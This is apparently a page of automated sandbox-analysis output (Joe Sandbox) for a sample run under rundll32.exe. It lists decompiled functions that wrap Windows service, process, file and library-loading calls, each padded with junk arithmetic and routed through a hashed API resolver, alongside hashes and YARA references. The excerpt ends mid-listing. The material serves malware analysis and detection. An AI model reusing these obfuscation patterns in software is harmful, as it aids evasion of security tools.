Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: 99fe4ad416d3772bc232068192e4adee6eb0d16a17955a53c4bd4c4fed17c93b
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: 94111671D00219EBEB14DFE4C94AAEEBBB4EB54318F208199E814A7251C3B95B488F91

Uniqueness

Uniqueness Score: -1.00%

Function 001D9EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001D9EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E001CE171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E001C606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,001D5A72,0000B2BF), ref: 001D9F9A

Memory Dump Source

Source File: 0000000E.00000002.2152460695.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000E.00000002.2152450425.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2152504521.00000000001DF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1c0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: c563da2d3fa1e11bd525ca8a3ccb0d98b82da2358b78d4677cdaba006f69c63a
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: FB11F0B5D0122DABDB04DFE9C84A9EEBFB4EF05344F108189E815A6250D3B45B608FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1532 Parent PID: 620 rundll32.exeCOMMON

Executed Functions

Function 001E7FC8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E001E7FC8(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, void* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				void* _t54;
				signed int _t56;
				signed int _t57;
				long _t64;

				_push(_a16);
				_t64 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001DE171(_t43);
				_v12 = 0x3d4b;
				_v12 = _v12 + 0xba0c;
				_v12 = _v12 ^ 0x32f19bab;
				_v12 = _v12 ^ 0x32f14d3d;
				_v20 = 0x6588;
				_t56 = 0x46;
				_v20 = _v20 / _t56;
				_v20 = _v20 ^ 0x00006149;
				_v8 = 0xc11f;
				_t57 = 0x1c;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00002da7;
				_v16 = 0xd6d7;
				_v16 = _v16 ^ 0xb4edc2cf;
				_v16 = _v16 ^ 0xb4ed5042;
				E001D606F(0xac, 0xb6b01ae5, _t57, _t57, 0xfa5912f8);
				_t54 = RtlAllocateHeap(_a16, _t64, _a8); // executed
				return _t54;
			}

0x001e7fcf
0x001e7fd2
0x001e7fd4
0x001e7fd7
0x001e7fda
0x001e7fdd
0x001e7fdf
0x001e7fe4
0x001e7fed
0x001e7ff4
0x001e7ffb
0x001e8002
0x001e800e
0x001e8013
0x001e8018
0x001e801f
0x001e8029
0x001e8034
0x001e8037
0x001e803b
0x001e8042
0x001e8049
0x001e8050
0x001e806f
0x001e807e
0x001e8084

APIs

RtlAllocateHeap.NTDLL(?,026DAAD3,B4ED5042,?,?,?,?,?,?,?,?,?,?), ref: 001E807E

Strings

Ia, xrefs: 001E8018
K=, xrefs: 001E7FE4

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ia$K=
API String ID: 1279760036-1694132640
Opcode ID: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction ID: 031118fce53b7dfe84fdb84eb2ec8d3dc587c24afbc63b660886dc6d431c82db
Opcode Fuzzy Hash: b789e11f9eea775a78287693f7352f71c317194be4ff8f8270c2d0e745cba24f
Instruction Fuzzy Hash: CE115971E00218EBEF04DFE5C90A8DEBFB2EB45310F108189FA146A250C3B69A218B91

Uniqueness

Uniqueness Score: -1.00%

Function 001E29A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 001E2A76

Strings

-:, xrefs: 001E29C4

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -:
API String ID: 1514166925-3625610842
Opcode ID: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction ID: aa497d58a25bd09f33a981c0b88ed443891968d294cd420de3690bc0cd85ac6b
Opcode Fuzzy Hash: f512e2cfcb210f02178d04eca577d79f121b754574598481bdb18aec6494e751
Instruction Fuzzy Hash: BC2123B2D01219BBDF15EFD5C84A8DEBBB5FF04758F108089E92866250D3B94B54DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001D30A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E001D30A4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t51;
				signed int _t53;
				signed int _t54;
				void* _t61;

				_push(_a12);
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001DE171(_t40);
				_v20 = 0x20f1;
				_v20 = _v20 | 0xe56d7bd2;
				_v20 = _v20 ^ 0xe56d3b5f;
				_v16 = 0x60a3;
				_v16 = _v16 | 0xd94b0631;
				_v16 = _v16 ^ 0xd94b4fc4;
				_v8 = 0x959e;
				_t53 = 0x46;
				_v8 = _v8 / _t53;
				_v8 = _v8 + 0xffff8b5f;
				_t54 = 0x4f;
				_v8 = _v8 / _t54;
				_v8 = _v8 ^ 0x033dd111;
				_v12 = 0xe903;
				_v12 = _v12 + 0xffff1267;
				_v12 = _v12 ^ 0xffffff7c;
				E001D606F(0x14b, 0xbee648b, _t54, _t54, 0x43269794);
				_t51 = CloseServiceHandle(_t61); // executed
				return _t51;
			}

0x001d30ab
0x001d30ae
0x001d30b0
0x001d30b3
0x001d30b7
0x001d30b8
0x001d30bd
0x001d30c6
0x001d30cd
0x001d30d4
0x001d30db
0x001d30e2
0x001d30e9
0x001d30f5
0x001d30fa
0x001d30ff
0x001d3109
0x001d3114
0x001d3117
0x001d311e
0x001d3125
0x001d312c
0x001d314b
0x001d3154
0x001d315a

APIs

CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 001D3154

Strings

_;m, xrefs: 001D313C

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: _;m
API String ID: 1725840886-664033043
Opcode ID: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction ID: db849fab11bcaf286e8f4eeae690026f809c85c9fc8661792d9b6ed8199d9bf2
Opcode Fuzzy Hash: 645477ed48e2118058f0cbc5a8afeb89a96a5cc23f06e2a0e3471286d8c9f7a7
Instruction Fuzzy Hash: 65113D76E00218FFEB04DFE8CC468DEBBB1EB44310F108599E524AB292D7B55B119B91

Uniqueness

Uniqueness Score: -1.00%

Function 001DE172, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E001DE172(void* __ecx, void* __edx, void* _a4, int _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t41;
				void* _t48;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001DE171(_t41);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2ee32c;
				_v20 = 0x466;
				_v20 = _v20 + 0xbcb9;
				_v20 = _v20 ^ 0x000097c2;
				_v8 = 0x1d17;
				_v8 = _v8 + 0xe3a6;
				_v8 = _v8 | 0x1371b482;
				_v8 = _v8 + 0xcae3;
				_v8 = _v8 ^ 0x13721426;
				_v16 = 0xc1c8;
				_v16 = _v16 + 0xffff2ba9;
				_v16 = _v16 ^ 0xffffbe8b;
				_v12 = 0x3352;
				_v12 = _v12 << 9;
				_v12 = _v12 | 0x4940d942;
				_v12 = _v12 ^ 0x4966c2a7;
				E001D606F(0x24f, 0xbee648b, __ecx, __ecx, 0x334b429d);
				_t48 = OpenServiceW(_a4, _a12, _a8); // executed
				return _t48;
			}

0x001de178
0x001de17b
0x001de17e
0x001de181
0x001de185
0x001de186
0x001de18b
0x001de192
0x001de19e
0x001de1a5
0x001de1ac
0x001de1b3
0x001de1ba
0x001de1c1
0x001de1c8
0x001de1cf
0x001de1d6
0x001de1dd
0x001de1e4
0x001de1eb
0x001de1f2
0x001de1f6
0x001de1fd
0x001de21c
0x001de22d
0x001de232

APIs

OpenServiceW.ADVAPI32(4966C2A7,000097C2,FFFFBE8B,?,?,?,?,?,?,?,?,?,?), ref: 001DE22D

Strings

,., xrefs: 001DE192

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ,.
API String ID: 3098006287-263192673
Opcode ID: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction ID: f4b83149f3f87370da33b2c78f36a9d7fc95cf09c0c136338f4833f92f08245a
Opcode Fuzzy Hash: 47688d64d3b0e0483b819327fb3ad2d4dd2b99bd4eab320a8e24d3c64762cb4c
Instruction Fuzzy Hash: 1311F6B6D00209FBEF01DFD4C94A8AEBB70BB14304F108188E91566261D3B58B149F91

Uniqueness

Uniqueness Score: -1.00%

Function 001E7998, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E001E7998(void* __ecx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __edx;
				void* _t42;
				struct HINSTANCE__* _t49;
				void* _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001DE171(_t42);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x25d38;
				_v20 = 0x510f;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x00005672;
				_v16 = 0xf8b1;
				_v16 = _v16 + 0xffff15e9;
				_v16 = _v16 + 0xffffcd36;
				_v16 = _v16 ^ 0xffff83d2;
				_v12 = 0x4d1a;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000018af;
				_v8 = 0x7f5d;
				_v8 = _v8 ^ 0x2c3d59fe;
				_v8 = _v8 + 0x58d2;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0x5fdd21ae;
				_push(0x811bfff3);
				_push(0xb6b01ae5);
				_t52 = 0x55;
				E001D606F(_t52);
				_t49 = LoadLibraryW(_a12); // executed
				return _t49;
			}

0x001e799e
0x001e79a1
0x001e79a4
0x001e79a9
0x001e79ae
0x001e79b5
0x001e79bc
0x001e79c3
0x001e79c7
0x001e79ce
0x001e79d5
0x001e79dc
0x001e79e3
0x001e79ea
0x001e79f1
0x001e79f5
0x001e79f9
0x001e79fd
0x001e7a04
0x001e7a0b
0x001e7a12
0x001e7a19
0x001e7a1d
0x001e7a30
0x001e7a37
0x001e7a3e
0x001e7a3f
0x001e7a4a
0x001e7a4f

APIs

LoadLibraryW.KERNEL32(00005672,?,?,?,?,?,?,?,?,38246A1A), ref: 001E7A4A

Strings

rV, xrefs: 001E79C7

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: rV
API String ID: 1029625771-3738762570
Opcode ID: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction ID: abb49d8105fe7a0f63a54ce48abe88851fe49b816998948aac9ea26631174e1d
Opcode Fuzzy Hash: 6c2337c38b901229c7e322e5f1d9b1029b3c9dada85b33bca72088930e709091
Instruction Fuzzy Hash: 6211F3B6D1160DFBDB14DFE4C84A4AEBBB4BB10309F208588E925662A0D3B48B149F90

Uniqueness

Uniqueness Score: -1.00%

Function 001EC7C3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E001EC7C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t44;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x43a94f;
				_v32 = 0x1049b9;
				_v28 = 0x3eaad4;
				_v20 = 0xf167;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x00002afd;
				_v12 = 0xf1a2;
				_v12 = _v12 + 0xb8a5;
				_v12 = _v12 | 0x0ef61b66;
				_v12 = _v12 ^ 0xe07f37e9;
				_v12 = _v12 ^ 0xee88d275;
				_v8 = 0xe943;
				_v8 = _v8 + 0xe3dd;
				_v8 = _v8 | 0x8abcb7de;
				_v8 = _v8 + 0xffff75bb;
				_v8 = _v8 ^ 0x8abd009e;
				_v16 = 0x92be;
				_v16 = _v16 + 0xa80e;
				_v16 = _v16 ^ 0x00014c59;
				_push(0xec5aa560);
				_push(_t43);
				_push(0xb6b01ae5);
				_t44 = 0x2d;
				E001D606F(_t44);
				ExitProcess(0);
			}

0x001ec7c9
0x001ec7cd
0x001ec7d4
0x001ec7db
0x001ec7e2
0x001ec7e9
0x001ec7ed
0x001ec7f4
0x001ec7fb
0x001ec802
0x001ec809
0x001ec810
0x001ec817
0x001ec81e
0x001ec825
0x001ec82c
0x001ec833
0x001ec83b
0x001ec842
0x001ec849
0x001ec85c
0x001ec862
0x001ec863
0x001ec86a
0x001ec86b
0x001ec875

APIs

ExitProcess.KERNELBASE(00000000), ref: 001EC875

Strings

C, xrefs: 001EC817

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: C
API String ID: 621844428-3705061908
Opcode ID: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction ID: f09041745f3082e574f15db5e02dad56aa6200b774cc7524afbe3ed5623e8c71
Opcode Fuzzy Hash: 5166b79bcc50a558bfb193a34fc174177961b77d3bd12aa0b8ebd5d1b0848ce2
Instruction Fuzzy Hash: 19111CB5D0130DEBEB44CFE5D94A5EEBBB0FB14318F208189D51176291D3B85B489F81

Uniqueness

Uniqueness Score: -1.00%

Function 001E0DE5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E001E0DE5(void* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edx;
				void* _t41;
				int _t53;
				signed int _t55;
				void* _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001DE171(_t41);
				_v8 = 0x13b8;
				_v8 = _v8 + 0x3dca;
				_v8 = _v8 | 0xf08d47e2;
				_t55 = 0x6c;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 ^ 0x7968eec6;
				_v20 = 0x39de;
				_push(0x457707f1);
				_v20 = _v20 / _t55;
				_v20 = _v20 ^ 0x00003bca;
				_v16 = 0x3217;
				_push(_t55);
				_push(_t55);
				_push(0xb6b01ae5);
				_v16 = _v16 * 0x55;
				_v16 = _v16 | 0x68e2e048;
				_v16 = _v16 ^ 0x68f2fb55;
				_v12 = 0x5ca5;
				_v12 = _v12 | 0x2e6919c4;
				_t59 = 0x3f;
				_v12 = _v12 * 0x2e;
				_v12 = _v12 ^ 0x56eeeba3;
				E001D606F(_t59);
				_t53 = CloseHandle(_a8); // executed
				return _t53;
			}

0x001e0deb
0x001e0dee
0x001e0df1
0x001e0df6
0x001e0dfb
0x001e0e04
0x001e0e0b
0x001e0e18
0x001e0e1c
0x001e0e1f
0x001e0e26
0x001e0e32
0x001e0e37
0x001e0e3a
0x001e0e41
0x001e0e4c
0x001e0e4d
0x001e0e4e
0x001e0e55
0x001e0e58
0x001e0e5f
0x001e0e66
0x001e0e6d
0x001e0e78
0x001e0e79
0x001e0e7c
0x001e0e8f
0x001e0e9a
0x001e0e9f

APIs

CloseHandle.KERNELBASE(68F2FB55,?,?,?,?,?,?,?,?,00000000), ref: 001E0E9A

Strings

Hh, xrefs: 001E0E58

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: Hh
API String ID: 2962429428-996502550
Opcode ID: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction ID: cf37f38707bdcba236d8cf8b03f9a91c9039b6c83d508e3b6fa9d44b0cf01ae4
Opcode Fuzzy Hash: e7d45c783abdec88297e9039aa05dbf03639c62c0080e51466ba891bf10a3185
Instruction Fuzzy Hash: AD110374D0020DEBEF05DFE8C9469AEBFB5EB40304F60C599E524AB261D3B95B118F40

Uniqueness

Uniqueness Score: -1.00%

Function 001E8409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E001E8409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001DE171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E001D606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x001e8411
0x001e8416
0x001e8418
0x001e841b
0x001e841e
0x001e841f
0x001e8422
0x001e8425
0x001e8428
0x001e842b
0x001e842c
0x001e842f
0x001e8432
0x001e8435
0x001e8437
0x001e843c
0x001e8445
0x001e8448
0x001e8455
0x001e8458
0x001e845f
0x001e8462
0x001e8469
0x001e8470
0x001e8474
0x001e847b
0x001e8487
0x001e8488
0x001e8494
0x001e8499
0x001e84a0
0x001e84aa
0x001e84b5
0x001e84b8
0x001e84d7
0x001e84ee
0x001e84f5

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 001E84EE

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: fb5a1acec100065c96eab506e98dec2400cc11de1d380776a981ef157d1e5b59
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: CF310672A01208FBDF05DF95CD058DEBFB6FF88304F108199F914AA250D7B69A20DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E8165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E001E8165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001DE171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E001D606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

0x001e816e
0x001e8173
0x001e8175
0x001e8176
0x001e8179
0x001e817b
0x001e817e
0x001e817f
0x001e8182
0x001e8183
0x001e8186
0x001e8189
0x001e818c
0x001e818d
0x001e818e
0x001e8191
0x001e8194
0x001e8195
0x001e8196
0x001e819b
0x001e81a4
0x001e81a8
0x001e81af
0x001e81b6
0x001e81c3
0x001e81c7
0x001e81cf
0x001e81d4
0x001e81d7
0x001e81de
0x001e81e9
0x001e81ea
0x001e81eb
0x001e81f2
0x001e81f5
0x001e81fc
0x001e8203
0x001e8207
0x001e820e
0x001e8221
0x001e8222
0x001e823a
0x001e8242

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 001E823A

Memory Dump Source

Source File: 00000011.00000002.2157449477.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000011.00000002.2157430040.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2157486457.00000000001EF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: acbe278a5653bf6d1fe14524e860e49d01dfe809298e86a0a0e680cbf48efb36
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: DF21E3B290020DBFEF059E94CC86CEEBFB9FB44358F108199F91466260D3759A519B50

Uniqueness

Uniqueness Score: -1.00%

Function 001D94A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001D94A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E001DE171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E001D606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

0x001d94ae
0x001d94b0
0x001d94c1
0x001d94c6
0x001d94cf
0x001d94d6
0x001d94dd
0x001d94ea
0x001d94ee
0x001d94f1
0x001d94f5
0x001d94fc
0x001d9503
0x001d951a
0x001d951d
0x001d9524
0x001d952b
0x001d9534
0x001d9537
0x001d953a
0x001d954d
0x001d955b
0x001d9562

APIs

